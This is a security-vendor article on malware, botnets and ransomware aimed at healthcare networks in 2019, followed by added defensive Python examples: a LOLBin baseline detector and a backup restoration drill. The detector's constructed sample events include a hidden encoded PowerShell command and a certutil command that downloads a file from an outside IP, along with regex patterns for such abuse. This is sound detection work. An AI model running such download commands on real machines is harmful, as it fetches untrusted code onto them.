Malware, adware, trojans and other pests from the past and future rear their heads.
Cybercriminal organizations have targeted the global healthcare industry from the moment it first began to place patient medical, PII and billing information into a connected network.
The phenomenon has only grown since.
During the first five months of 2019, healthcare organizations continued to bear the brunt of this continuous attack pattern. Attacks ranged from targeted campaigns using phishing and customized ransomware to more traditional tactics such as common exploits, commodity malware and botnets. The examples below are offered so that defenders can learn from what has come before.
Two of the top exploits identified from January to May of 2019 targeted older vulnerabilities, which attackers used for everything from gaining initial access to an environment to executing arbitrary code and installing malware. A variety of recent campaigns have used these and newer vulnerabilities to target healthcare facilities.
Malware is used both to gain network access and to perform malicious tasks once the network perimeter has been breached. Of the top malware variants found during this analysis, two fell outside traditional malware techniques. The first is adware and riskware, which were among the top malware detected. While many perceive this sort of malware as merely a nuisance, many variants also drop additional malware through malvertising, in which attackers inject malicious code into legitimate online advertising to infect unsuspecting end users.
The other is Android/Generic.AP, a trojan that targets Android mobile devices. Once installed on a phone, it can establish a remote connection to attacker-controlled infrastructure, capture keystrokes, collect system information, download and upload files, launch denial-of-service attacks, and start or terminate processes. In healthcare networks with BYOD policies, a compromised phone can become a conduit for introducing additional malware and gaining unauthorized access.
Of the top 10 botnets affecting healthcare networks, five are mainstays across all industries. Three of the most worrisome are Gh0st RAT, Bladabindi and WINNTI.
Gh0st RAT is a remote administration tool with the typical abilities to take full control of the victim machine, log keystrokes, capture webcam and microphone data, and more. Bladabindi, also known as njRAT, has similar capabilities to Gh0st RAT but can also steal stored credentials such as usernames and passwords, along with other PII. It is important to note that last year a fileless version was identified in the wild with worm-like capabilities: it could propagate by infecting USB thumb drives. WINNTI is a trojan that has been used in many targeted campaigns by cybercriminal groups such as Winnti and Axiom.
In addition to traditional exploit, malware and botnet activity, there has also been a spike in targeted attacks. The Orangeworm threat actor group has been identified deploying an older trojan called Kwampirs, which targets the systems controlling MRI and X-ray machines and siphons their configuration data.
SamSam ransomware, which combines the destructive ransomware payload with targeted, hands-on-keyboard intrusion, has been targeting the healthcare industry for the last year or so. While many types of ransomware remain relatively unsophisticated, we are now seeing additional capabilities being developed and additional malware being bundled with the ransomware payload, which should worry security administrators.
Many attacks target older vulnerabilities to gain initial access to the network or to distribute malware. Best practices involve a four-tier process:
Ensure you have the visibility within your network to identify where your vulnerabilities are, and the right information to assess the overall risk to the organization. To do this, make sure you know the following:
Mission-Critical Systems — It’s crucial that you understand your mission-critical business processes and the systems those processes utilize. In healthcare, it is imperative that your strategy aligns with protection of critical revenue-generating service lines, or clinical care areas that cannot withstand downtime.
Cyber Assets — You need a dynamically updated inventory of every asset on your network, including the operating system, applications, data, services, processes, configuration settings and vulnerabilities of each asset. Pay particular attention to services and areas of the business where remote access is prevalent, for example telemedicine or remote clinics.
Network Infrastructure — Get familiar with your extended network topology and where and how all applications, workflows and data move. Given the high use of SaaS applications in any given environment, be sure to understand your partners' cloud infrastructure and security controls.
Medical Devices — Devices and other analysis, monitoring or treatment systems connected to the network need to be specifically identified and secured. Many of these devices are mobile, so they must be tracked as they move among hospital departments and, in some cases, into patients' homes.
Many attacks leverage trusted tools already present on your internal systems, a technique called "living off the land." Some of these are administrative tools, so malicious activity can be misinterpreted as normal. Understand how such tools function, harden their configuration, restrict who can run them, and baseline normal usage so that unexpected activity triggers an alert.
Attackers target mobile devices with corporate access (email and other business applications) to get into the network. However, detecting a phishing email or malicious activity on a mobile device is often more difficult than on a traditional laptop. In fact, cybercriminals are known to time malware launches for peak workforce "in transit" periods such as lunch and rush hour, knowing they will get a better response rate. Ensure that mobile threats are included in your user awareness training program.
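The "baseline, then alert" approach for dual-use administrative tools, as an added example that is not part of the original article or any vendor product. It assumes a simplified process-creation record format (one line per event, roughly what a Sysmon Event ID 1 or EDR export would give after flattening); the tool list, the argument patterns and every event line are constructed for the demo, not real hospital telemetry. The first pass learns which (host, user) pairs legitimately run each tool; the second pass alerts on any use outside that baseline, and separately on argument patterns that are rarely legitimate even for a baselined user (encoded PowerShell, certutil downloads and so on).

```python
"""Baseline-then-alert detection for living-off-the-land (LOLBin) activity.

Added example, not code from the original article. The record format is an
assumption; adapt EVENT_RE to your own EDR or Sysmon export. All events below
are constructed samples.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Assumed record layout: "<ts> host=<host> user=<user> image=<path> cmd=<args>"
EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>\S+) cmd="(?P<cmd>.*)"$'
)

# Dual-use admin tools that attackers routinely abuse (constructed short list).
LOLBINS = {"powershell.exe", "wmic.exe", "certutil.exe", "bitsadmin.exe",
           "mshta.exe", "regsvr32.exe", "rundll32.exe", "psexec.exe"}

# Argument patterns that are rarely legitimate even for a baselined user.
SUSPICIOUS_ARGS = {
    "powershell.exe": [r"-e(nc(odedcommand)?)?\b", r"-w(indowstyle)?\s+hidden",
                       r"downloadstring", r"\biex\b"],
    "certutil.exe": [r"-urlcache", r"-decode"],
    "bitsadmin.exe": [r"/transfer"],
    "mshta.exe": [r"https?://"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "rundll32.exe": [r"javascript:"],
}

# Constructed learning window: known-good scheduled and admin use of the tools.
BASELINE_EVENTS = [
    r'2019-05-01T08:02:11 host=RAD-WS01 user=svc_backup image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -File C:\Scripts\nightly_backup.ps1"',
    r'2019-05-01T09:15:40 host=ADMIN-01 user=itadmin image=C:\Windows\System32\wbem\WMIC.exe cmd="wmic.exe /node:RAD-WS01 os get lastbootuptime"',
    r'2019-05-02T08:01:58 host=RAD-WS01 user=svc_backup image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -File C:\Scripts\nightly_backup.ps1"',
]

# Constructed detection window: the same scheduled job, plus a nurse workstation
# suddenly running hidden encoded PowerShell and a certutil download.
NEW_EVENTS = [
    r'2019-05-08T08:02:03 host=RAD-WS01 user=svc_backup image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -File C:\Scripts\nightly_backup.ps1"',
    r'2019-05-08T10:10:10 host=NURSE-WS14 user=jdoe image=C:\Windows\System32\notepad.exe cmd="notepad.exe shift_notes.txt"',
    r'2019-05-08T12:31:05 host=NURSE-WS14 user=jdoe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmd="powershell.exe -nop -w hidden -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    r'2019-05-08T12:33:19 host=NURSE-WS14 user=jdoe image=C:\Windows\System32\certutil.exe cmd="certutil.exe -urlcache -split -f http://198.51.100.7/u.dat C:\Users\Public\u.dat"',
]


@dataclass
class Alert:
    ts: str
    host: str
    user: str
    tool: str
    reasons: list = field(default_factory=list)


def parse(line):
    """Return (ts, host, user, tool, cmd), or None for an unparseable record."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    tool = m["image"].rsplit("\\", 1)[-1].lower()
    return m["ts"], m["host"], m["user"], tool, m["cmd"]


def build_baseline(lines):
    """Map each LOLBin to the (host, user) pairs that legitimately ran it."""
    seen = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec and rec[3] in LOLBINS:
            seen[rec[3]].add((rec[1], rec[2]))
    return seen


def detect(lines, baseline):
    """Alert on LOLBin use outside the baseline or with suspicious arguments."""
    alerts = []
    for line in lines:
        rec = parse(line)
        if not rec or rec[3] not in LOLBINS:
            continue
        ts, host, user, tool, cmd = rec
        reasons = []
        if (host, user) not in baseline.get(tool, set()):
            reasons.append(f"{tool} not in baseline for {host}/{user}")
        for pat in SUSPICIOUS_ARGS.get(tool, []):
            if re.search(pat, cmd, re.IGNORECASE):
                reasons.append(f"suspicious argument matches /{pat}/")
        if reasons:
            alerts.append(Alert(ts, host, user, tool, reasons))
    return alerts


if __name__ == "__main__":
    for a in detect(NEW_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(f"{a.ts} {a.host} {a.user} {a.tool}: {'; '.join(a.reasons)}")
```

The scheduled backup job on RAD-WS01 runs PowerShell every day and never alerts, because that host/user pair was learned during the baseline window and its arguments are benign; the same binary on a nurse workstation fires twice over, once for being outside the baseline and once for the hidden, encoded command line. Keep the baseline keyed on host and user rather than on the tool alone, or one legitimate administrator will whitelist PowerShell for the whole estate.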
These include such things as:
Attackers who gain network access continue to drive deeper into the network to complete whatever goal they are pursuing. To reduce the overall impact of these efforts, implement intent-based segmentation in your network. This sort of "continual resistance" limits lateral movement, slows attacks and can even discourage attackers, giving you more time to detect and mitigate them.
Ransomware is one of the most common payloads of targeted attacks. Proper preparation includes offline backups, scanning backed-up data for malware and tampering, and running restoration drills so that recovery is fast and painless. On the business side, talk through these scenarios with your heads of communications, operations and finance, and have a plan at the ready.
As long as the global healthcare industry manages and stores personal, medical and PII data on patients, it will remain a prime target for cybercriminals. Such attacks put not only data at risk but also critical services and, where medical devices are attacked, patient lives. It is essential that the security teams responsible for the data and devices spread across healthcare campuses stay aware of the latest threat trends, practice essential security hygiene and take the steps outlined above to establish and maintain a baseline of security for patients and staff alike.
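A minimal restoration drill, as an added example that is not part of the original article. It models the advice above with a SHA-256 manifest: the manifest is built when the backup is taken and is meant to be kept offline, separate from the backup share, so ransomware that reaches the share cannot rewrite it; before any restore the backup is checked against the manifest, then restored to scratch space and checked again. The directory layout, file names and sample contents are all constructed for the demo, and "simulate_ransomware" is a stand-in for a real infection, not an analysis of any named family.

```python
"""Backup integrity check and restoration drill against an offline manifest.

Added example, not code from the original article. Everything here runs in a
temporary directory with constructed sample files.
"""
import hashlib
import os
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Relative path -> SHA-256 for every file under root."""
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def take_backup(src: Path, dest: Path) -> dict:
    """Copy src to dest and return its manifest.

    Store the returned manifest OFFLINE (not on the backup share): it is the
    reference that an attacker who encrypts the share must not be able to edit.
    """
    shutil.copytree(src, dest)
    return build_manifest(dest)


def verify_backup(backup: Path, manifest: dict) -> list:
    """Return a list of problems (missing, altered, unexpected files); empty is clean."""
    problems = []
    current = build_manifest(backup)
    for rel, digest in manifest.items():
        if rel not in current:
            problems.append(f"missing: {rel}")
        elif current[rel] != digest:
            problems.append(f"altered: {rel}")
    for rel in current:
        if rel not in manifest:
            # e.g. a ransom note dropped into the share after the backup ran
            problems.append(f"unexpected: {rel}")
    return problems


def restore_drill(backup: Path, manifest: dict, scratch: Path) -> bool:
    """Verify the backup, restore it to scratch, verify the restored copy.

    Returns True only if both checks pass; a backup that fails verification is
    never restored, so a poisoned copy cannot be reintroduced into production.
    """
    if verify_backup(backup, manifest):
        return False
    shutil.copytree(backup, scratch)
    return not verify_backup(scratch, manifest)


def simulate_ransomware(backup: Path, rel: str) -> None:
    """Stand-in for an infection: overwrite one file in place and drop a note."""
    (backup / rel).write_bytes(os.urandom(64))
    (backup / "README_DECRYPT.txt").write_text("your files are encrypted\n")


def demo() -> tuple:
    """Run a clean drill, then poison the backup and run it again."""
    work = Path(tempfile.mkdtemp())
    try:
        src = work / "ehr"                       # constructed sample data set
        (src / "billing").mkdir(parents=True)
        (src / "patients.db").write_bytes(b"constructed sample record\n" * 100)
        (src / "billing" / "claims.csv").write_text("id,amount\n1,250.00\n")
        manifest = take_backup(src, work / "backup")
        clean = restore_drill(work / "backup", manifest, work / "restore1")
        simulate_ransomware(work / "backup", "patients.db")
        problems = verify_backup(work / "backup", manifest)
        dirty = restore_drill(work / "backup", manifest, work / "restore2")
        return clean, dirty, problems
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    clean, dirty, problems = demo()
    print("clean drill passed:", clean)
    print("poisoned drill passed:", dirty, "problems:", problems)
```

The first drill passes; after the simulated infection the check reports the altered database file and the unexpected ransom note, and the drill refuses to restore. In a real deployment the manifest would be signed or stored on media the backup service cannot write to, the scan step would additionally run the restored files through an anti-malware engine, and the drill would be scheduled, with its pass/fail result feeding the same alerting as any other control.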
Sonia Arista is a seasoned Information Security and Technology specialist with over 20 years’ experience. At Fortinet, she is responsible for the go-to-market strategy, solutions and sales growth for the company’s healthcare and life sciences business.